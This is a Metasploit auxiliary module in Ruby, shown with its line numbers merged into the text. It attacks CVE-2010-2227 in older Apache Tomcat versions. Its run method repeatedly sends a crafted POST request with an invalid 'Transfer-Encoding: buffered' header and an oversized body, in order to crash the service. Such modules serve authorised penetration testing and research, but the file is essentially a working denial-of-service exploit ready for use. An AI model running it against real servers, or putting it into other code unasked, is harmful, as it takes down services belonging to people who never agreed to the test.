Path: blob/master/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Apache Tomcat Transfer-Encoding Information Disclosure and DoS',14'Description' => %q{15Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not16properly handle an invalid Transfer-Encoding header, which allows remote attackers17to cause a denial of service (application outage) or obtain sensitive information18via a crafted header that interferes with "recycling of a buffer."19},20'Author' => [21'Steve Jones', # original discoverer22'Hoagie <andi[at]void.at>', # original public exploit23'Paulino Calderon <calderon[at]websec.mx>', # metasploit module24],25'License' => MSF_LICENSE,26'References' => [27[ 'CVE', '2010-2227' ],28[ 'OSVDB', '66319' ],29[ 'BID', '41544' ]30],31'DisclosureDate' => '2010-07-09',32'Notes' => {33'Stability' => [CRASH_SERVICE_DOWN],34'SideEffects' => [],35'Reliability' => []36}37)38)3940register_options(41[42Opt::RPORT(8000),43OptInt.new('RLIMIT', [ true, 'Number of requests to send', 25])44]45)46end4748def run49for x in 1..datastore['RLIMIT']50begin51connect52print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")5354sploit = "POST / HTTP/1.1\r\n"55sploit << 'Host: ' + rhost + "\r\n"56sploit << "Transfer-Encoding: buffered\r\n"57sploit << "Content-Length: 65537\r\n\r\n"58sploit << Rex::Text.rand_text_alpha(1) * 655375960sock.put(sploit + "\r\n\r\n")61disconnect6263print_error('DoS packet unsuccessful')64rescue ::Rex::ConnectionRefused65print_error("Unable to connect to #{rhost}:#{rport}")66rescue ::Errno::ECONNRESET67print_good("DoS packet successful. #{rhost} not responding.")68rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout69print_error("Couldn't connect to #{rhost}:#{rport}")70rescue ::Timeout::Error, ::Errno::EPIPE => e71vprint_error(e.message)72end73end74end75end767778